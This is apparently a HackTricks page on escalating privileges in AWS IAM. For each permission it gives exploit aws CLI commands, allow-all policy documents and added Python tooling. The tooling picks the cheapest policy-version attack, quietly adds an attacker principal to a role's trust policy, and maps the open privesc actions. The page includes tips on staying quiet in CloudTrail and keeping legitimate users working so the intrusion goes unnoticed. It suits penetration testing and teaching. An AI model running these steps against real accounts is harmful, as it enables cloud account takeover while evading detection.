AWS - IAM Privesc

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

IAM

For more info about IAM check:

AWS - IAM, Identity Center & SSO Enum

iam:CreatePolicyVersion

Grants the ability to create a new version of an IAM managed policy and, with the --set-as-default flag, make it the default version without needing iam:SetDefaultPolicyVersion. The new version can contain whatever permissions you choose. Note that a managed policy keeps at most 5 versions: if the target already has 5, the call fails with a limit-exceeded error and you need iam:DeletePolicyVersion to remove a non-default version first.

Exploit Command:

bash
aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Impact: Direct privilege escalation by allowing any action on any resource, for every user, group and role the policy is attached to.

iam:SetDefaultPolicyVersion

Allows changing the default version of an IAM policy to another existing version, which escalates privileges if that version is more permissive than the current default. Check the existing versions first (aws iam list-policy-versions / aws iam get-policy-version): this only helps if a more permissive version already exists.

Amri ya Bash:

bash
aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Impact: Indirect privilege escalation by enabling more permissions.
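Which of the two techniques above is usable depends on the versions the policy already has. The following Python is an added example (not HackTricks' code or an AWS tool) that takes the decoded output of aws iam list-policy-versions / aws iam get-policy-version, constructed here as sample data, and returns the cheapest path: flip the default to a stale admin version, create a new version, or delete the oldest non-default version first because the 5-version quota is full.

```python
# Added example, not HackTricks' or AWS code: pick the cheapest way to turn a
# managed policy into an admin policy given its existing versions. The input is
# a constructed stand-in for `aws iam list-policy-versions` with each version's
# decoded Document (as returned by `aws iam get-policy-version`).
MAX_POLICY_VERSIONS = 5  # IAM quota: a customer managed policy keeps at most 5 versions


def _as_list(value):
    return [value] if isinstance(value, str) else list(value or [])


def statements(document):
    stmts = document.get("Statement", [])
    return [stmts] if isinstance(stmts, dict) else list(stmts)


def is_full_admin(document):
    """True if an unconditional Allow statement grants Action "*" on Resource "*"."""
    for stmt in statements(document):
        if stmt.get("Effect") != "Allow" or "Condition" in stmt:
            continue
        if "*" in _as_list(stmt.get("Action")) and "*" in _as_list(stmt.get("Resource")):
            return True
    return False


def plan_policy_version_attack(versions):
    """versions: list of {"VersionId", "IsDefaultVersion", "Document"} dicts.
    Returns the API call to make and the IAM permissions it needs."""
    default_id = next(v["VersionId"] for v in versions if v["IsDefaultVersion"])
    # Path 1: a forgotten non-default version is already admin -> only flip the default
    for v in versions:
        if v["VersionId"] != default_id and is_full_admin(v["Document"]):
            return {"action": "set-default", "version_id": v["VersionId"],
                    "needs": ["iam:SetDefaultPolicyVersion"]}
    # Path 2: create a new admin version; --set-as-default needs no extra permission
    plan = {"action": "create-version", "needs": ["iam:CreatePolicyVersion"],
            "delete_first": None}
    if len(versions) >= MAX_POLICY_VERSIONS:
        # CreatePolicyVersion would hit the quota; the default version cannot be
        # deleted, so remove the oldest non-default one (needs iam:DeletePolicyVersion)
        oldest = min((v["VersionId"] for v in versions if v["VersionId"] != default_id),
                     key=lambda vid: int(vid.lstrip("v")))
        plan["delete_first"] = oldest
        plan["needs"].append("iam:DeletePolicyVersion")
    return plan


# Constructed sample documents
READ_ONLY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:Get*", "s3:List*"], "Resource": "*"}]}
ADMIN = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["*"], "Resource": ["*"]}]}


def _version(version_id, is_default, document):
    return {"VersionId": version_id, "IsDefaultVersion": is_default, "Document": document}


# Sample 1: five harmless versions with v5 as default -> v1 must be deleted first
FULL_POLICY = [_version(f"v{i}", i == 5, READ_ONLY) for i in range(1, 6)]
# Sample 2: v2 is a stale admin version nobody cleaned up -> just set it as default
STALE_ADMIN_POLICY = [_version("v1", False, READ_ONLY),
                      _version("v2", False, ADMIN),
                      _version("v3", True, READ_ONLY)]

if __name__ == "__main__":
    print(plan_policy_version_attack(FULL_POLICY))
    print(plan_policy_version_attack(STALE_ADMIN_POLICY))
```

The "needs" list is what to compare against your own effective permissions before touching the policy; deleting a version and creating a new one are two separate CloudTrail events, so path 1 is both cheaper and quieter when it exists.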

iam:CreateAccessKey

Allows creating an access key ID and secret access key for another user, which can result in privilege escalation. A user can have at most 2 access keys, so the call fails if the target already has two.

Exploit:

bash
aws iam create-access-key --user-name <target_user>

Impact: Direct privilege escalation by taking over the (more privileged) permissions of another user.

iam:CreateLoginProfile | iam:UpdateLoginProfile

Allows creating or updating a login profile, i.e. setting a password for AWS console login, which results in direct privilege escalation. Creation fails if the user already has a console password; the update variant replaces the legitimate user's password and is therefore noticeable.

Exploit for Creation:

bash
aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Exploit for Update:

bash
aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Impact: Direct privilege escalation by logging into the console as "any" user. If the target has an MFA device assigned, console sign-in will still prompt for it, so this is usually combined with iam:DeactivateMFADevice.

iam:UpdateAccessKey

Allows re-enabling a disabled access key, which can lead to unauthorised access if the attacker holds the secret of the disabled key (e.g. a leaked key that was deactivated instead of deleted).

Exploit:

bash
aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Impact: Direct privilege escalation by reactivating access keys.

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

Allows generating or resetting credentials for specific AWS services (for example CodeCommit HTTPS Git credentials or Amazon Keyspaces), which inherit the associated user's permissions for that service. The password is only returned by the create/reset call, so resetting an existing credential hands you a working password (and invalidates the legitimate one).

Exploit for Creation:

bash
aws iam create-service-specific-credential --user-name <username> --service-name <service>

Exploit for Reset:

bash
aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Impact: Direct privilege escalation within the user's permissions for that service.

iam:AttachUserPolicy || iam:AttachGroupPolicy

Allows attaching managed policies to users or groups, escalating privileges directly by inheriting the permissions of the attached policy (e.g. arn:aws:iam::aws:policy/AdministratorAccess).

Exploit for User:

bash
aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Exploit for Group:

bash
aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Impact: Direct privilege escalation to whatever the policy grants.

iam:AttachRolePolicy, (sts:AssumeRole | iam:CreateRole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy

Allows attaching managed policies or putting inline policies on roles, users or groups, which results in direct privilege escalation by granting extra permissions. For the role variants you also need a way to use the role: either sts:AssumeRole on a role that already trusts your principal, or iam:CreateRole to create a role whose trust policy trusts you and then attach the policy to it.

Exploit for Role:

bash
aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

Exploit for Inline Policies:

bash
aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

You can use a policy such as:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

Impact: Direct privilege escalation by adding permissions through policies.

iam:AddUserToGroup

Allows adding a user (yourself or one you control) to an IAM group, escalating privileges by inheriting the group's permissions.

Exploit:

bash
aws iam add-user-to-group --group-name <group_name> --user-name <username>

Impact: Direct privilege escalation to the level of the group's permissions.

iam:UpdateAssumeRolePolicy

Allows modifying a role's trust (assume role) policy document, so you can make the role trust your principal and then assume it with sts:AssumeRole to obtain its permissions. The new document replaces the old one entirely, so include the existing principals if legitimate users of the role should keep working.

Exploit:

bash
aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

Where the policy looks like the following, which grants your principal ($USER_ARN) permission to assume the role:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

Impact: Direct privilege escalation by taking the permissions of any role.
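A trust policy written from scratch like the one above drops every principal the role already trusted. The Python below is an added example (not HackTricks' code) that instead merges an attacker principal into an existing trust policy, skipping statements with a Condition (ExternalId, MFA, etc.) that would bind the attacker as well; the role's original trust document and the attacker ARN are constructed for illustration.

```python
# Added example, not HackTricks' code: produce the document for
# `aws iam update-assume-role-policy --policy-document file://trust.json`
# while keeping every principal the role already trusts. ARNs are made up.
import copy
import json

ATTACKER_ARN = "arn:aws:iam::111122223333:user/attacker"  # assumption: our own principal


def _as_list(value):
    return [value] if isinstance(value, str) else list(value or [])


def statements(document):
    stmts = document.get("Statement", [])
    return [stmts] if isinstance(stmts, dict) else list(stmts)


def add_trusted_principal(trust_policy, principal_arn):
    """Return a copy of trust_policy that also lets principal_arn call sts:AssumeRole."""
    doc = copy.deepcopy(trust_policy)
    doc["Statement"] = statements(doc)
    for stmt in doc["Statement"]:
        principal = stmt.get("Principal")
        # Only extend plain AWS-principal Allow statements without a Condition:
        # a Condition (ExternalId, MFA, SourceIdentity...) would apply to us too,
        # and Service/Federated principals are a different trust model
        if (stmt.get("Effect") != "Allow" or "Condition" in stmt
                or not isinstance(principal, dict) or "AWS" not in principal
                or "sts:AssumeRole" not in _as_list(stmt.get("Action"))):
            continue
        aws = _as_list(principal["AWS"])
        if principal_arn not in aws:
            aws.append(principal_arn)
        principal["AWS"] = aws if len(aws) > 1 else aws[0]
        return doc
    # No suitable statement: append a dedicated one and leave the rest untouched
    doc["Statement"].append({"Effect": "Allow",
                             "Principal": {"AWS": principal_arn},
                             "Action": "sts:AssumeRole"})
    return doc


def trusted_aws_principals(trust_policy):
    """Every AWS principal named in an Allow statement of the trust policy."""
    found = set()
    for stmt in statements(trust_policy):
        principal = stmt.get("Principal")
        if stmt.get("Effect") == "Allow" and isinstance(principal, dict):
            found.update(_as_list(principal.get("AWS")))
    return found


# Constructed sample: a role trusted by the EC2 service principal and, with an
# ExternalId condition, by a third-party account
ORIGINAL_TRUST = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"},
         "Action": "sts:AssumeRole"},
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999999999999:root"},
         "Action": "sts:AssumeRole",
         "Condition": {"StringEquals": {"sts:ExternalId": "vendor-12345"}}},
    ],
}

if __name__ == "__main__":
    # Save this output as trust.json and pass it with --policy-document file://trust.json
    print(json.dumps(add_trusted_principal(ORIGINAL_TRUST, ATTACKER_ARN), indent=2))
```

Fetch the current document first (aws iam get-role returns it as AssumeRolePolicyDocument) so the merge starts from what is really deployed; UpdateAssumeRolePolicy still shows up in CloudTrail, but nothing that depended on the role breaks.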

iam:UploadSSHPublicKey || iam:DeactivateMFADevice

Allows uploading an SSH public key for authenticating to CodeCommit as the target user, and deactivating MFA devices, both of which can result in indirect privilege escalation.

Exploit for SSH Key Upload:

bash
aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

Exploit for MFA deactivation:

bash
aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

Impact: Indirect privilege escalation by gaining CodeCommit access as the user or by removing MFA protection (e.g. to satisfy policies conditioned on MFA or to log into the console after setting a password).

iam:ResyncMFADevice

Allows resynchronising an MFA device, which can result in indirect privilege escalation by tampering with MFA protection. The call requires two consecutive codes from the device, so it only helps if you already hold its seed.

Bash Command:

bash
aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Impact: Indirect privilege escalation by tampering with MFA devices.

iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)

With these permissions you can change the XML metadata of the SAML federation. Then you can abuse the SAML federation to log in (sts:AssumeRoleWithSAML) as any role that trusts the provider.

Note that if you do this, legitimate users will not be able to log in. However, you can fetch the current XML, set yours, log in and then restore the previous one so it keeps working.

bash
# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

note

TODO: Tool that can generate the SAML metadata and log in to a specific role

iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)

(Not sure about this) If an attacker has these permissions, they could add a new thumbprint in order to log in to all the roles that trust the provider. Note that the thumbprint only tells IAM which server certificate to accept when it fetches the provider's keys from the provider URL; the URL itself does not change, so you would additionally need to control what that URL serves. Also, for providers whose certificate chains to a root in AWS's own library of trusted CAs, AWS no longer uses the thumbprint list for validation at all.

bash
# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

iam:PutUserPermissionsBoundary

This permission lets an attacker update a user's permissions boundary, so they may escalate privileges by enabling actions that the user's current boundary blocks. A boundary never grants permissions on its own: it caps what the identity policies can do, so setting an allow-all boundary removes the cap and the user's identity policies apply in full.

bash
aws iam put-user-permissions-boundary \
--user-name <user_name> \
--permissions-boundary arn:aws:iam::<account>:policy/<policy_name>

An example of a policy that applies no restriction is:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "BoundaryAllowAll",
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}

iam:PutRolePermissionsBoundary

A principal with iam:PutRolePermissionsBoundary can set the permissions boundary of an existing role. The risk arises when someone with this permission changes a role's boundary: they can wrongly restrict it (causing service disruption) or, by setting a permissive boundary, effectively widen what the role can do and escalate privileges (as with users, the role's identity policies still have to grant the actions).

bash
aws iam put-role-permissions-boundary \
--role-name <Role_Name> \
--permissions-boundary arn:aws:iam::111122223333:policy/BoundaryPolicy
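To see how a boundary interacts with identity policies in the iam:PutUserPermissionsBoundary and iam:PutRolePermissionsBoundary cases above, here is an added example (not HackTricks' code) of a simplified evaluator in Python: identity policies are combined with explicit-Deny precedence, then intersected with the boundary, and the result is checked against the privesc actions listed on this page. Only Effect, Action and NotAction are modelled (Resource and Condition are ignored), and the sample policies are constructed.

```python
# Added example, not HackTricks' or AWS code: a simplified IAM evaluation that
# models identity policies (explicit Deny wins) intersected with a permissions
# boundary, to show what iam:PutUserPermissionsBoundary / PutRolePermissionsBoundary
# change. Only Effect, Action and NotAction are modelled; Resource and Condition
# are ignored, so treat it as a triage aid. All sample policies are constructed.
import fnmatch

# The privesc actions covered on this page
PRIVESC_ACTIONS = [
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion", "iam:CreateAccessKey",
    "iam:CreateLoginProfile", "iam:UpdateLoginProfile", "iam:UpdateAccessKey",
    "iam:CreateServiceSpecificCredential", "iam:ResetServiceSpecificCredential",
    "iam:AttachUserPolicy", "iam:AttachGroupPolicy", "iam:AttachRolePolicy",
    "iam:PutUserPolicy", "iam:PutGroupPolicy", "iam:PutRolePolicy",
    "iam:AddUserToGroup", "iam:UpdateAssumeRolePolicy", "iam:UploadSSHPublicKey",
    "iam:DeactivateMFADevice", "iam:ResyncMFADevice", "iam:UpdateSAMLProvider",
    "iam:UpdateOpenIDConnectProviderThumbprint", "iam:PutUserPermissionsBoundary",
    "iam:PutRolePermissionsBoundary",
]


def _as_list(value):
    return [value] if isinstance(value, str) else list(value or [])


def statements(document):
    stmts = document.get("Statement", [])
    return [stmts] if isinstance(stmts, dict) else list(stmts)


def _matches(pattern, action):
    # IAM action matching is case-insensitive; "*" and "?" are wildcards
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def policy_decision(document, action):
    """'deny' if an explicit Deny matches, 'allow' if only Allows match, else None."""
    decision = None
    for stmt in statements(document):
        actions = _as_list(stmt.get("Action"))
        not_actions = _as_list(stmt.get("NotAction"))
        if actions:
            hit = any(_matches(p, action) for p in actions)
        else:
            hit = bool(not_actions) and not any(_matches(p, action) for p in not_actions)
        if not hit:
            continue
        if stmt.get("Effect") == "Deny":
            return "deny"
        decision = "allow"
    return decision


def is_allowed(action, identity_policies, boundary=None):
    decisions = [policy_decision(p, action) for p in identity_policies]
    if "deny" in decisions or "allow" not in decisions:
        return False
    # A boundary grants nothing on its own: when one is attached, the action must
    # also be allowed (and not denied) by it
    return boundary is None or policy_decision(boundary, action) == "allow"


def privesc_surface(identity_policies, boundary=None):
    return [a for a in PRIVESC_ACTIONS if is_allowed(a, identity_policies, boundary)]


# Constructed sample policies
IAM_FULL = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "iam:*", "Resource": "*"}]}
EXPLICIT_DENY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Deny", "Action": ["iam:CreateAccessKey", "iam:*LoginProfile"], "Resource": "*"}]}
READONLY_BOUNDARY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*", "s3:*"], "Resource": "*"}]}
ALLOW_ALL_BOUNDARY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "BoundaryAllowAll", "Effect": "Allow", "Action": "*", "Resource": "*"}]}

if __name__ == "__main__":
    print("read-only boundary:", privesc_surface([IAM_FULL], READONLY_BOUNDARY))
    print("allow-all boundary:", privesc_surface([IAM_FULL], ALLOW_ALL_BOUNDARY))
    print("allow-all boundary + Deny:",
          privesc_surface([IAM_FULL, EXPLICIT_DENY], ALLOW_ALL_BOUNDARY))
```

With the read-only boundary the user's iam:* identity policy yields no privesc action at all; after the boundary is swapped for the allow-all policy every action on this page is open, except those an explicit Deny in an identity policy still blocks. That is also the defensive reading: a boundary is only as good as the protection around iam:PutUserPermissionsBoundary and iam:DeleteUserPermissionsBoundary.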
